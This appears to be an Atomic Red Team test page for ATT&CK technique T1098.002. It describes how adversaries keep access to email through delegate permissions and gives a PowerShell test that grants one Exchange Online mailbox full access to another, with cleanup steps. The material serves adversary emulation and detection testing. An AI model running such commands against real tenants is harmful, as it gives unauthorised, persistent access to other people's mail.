T1098.002
Account Manipulation: Additional Email Delegate Permissions
Description from ATT&CK
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.
For example, the Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add Additional Cloud Roles to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: Internal Spearphishing), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
Atomic Tests
Atomic Test #1 - EXO - Full access mailbox permission granted to a user
Give a nominated user, full mailbox delegation access of another user. This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
Supported Platforms: office-365
auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | office-365 username | string | o365_user_test@contoso.com |
| password | office-365 password | string | o365_password_test |
| delegate_target | office-365 target_email | string | delegate@contoso.com |
| operator_mailbox | office-365 target_email | string | operator@contoso.com |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
Disconnect-ExchangeOnline -Confirm:$false
Cleanup Commands:
1
2
3
4
5
6
7
Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
Disconnect-ExchangeOnline -Confirm:$false
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
1
2
3
4
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name ExchangeOnlineManagement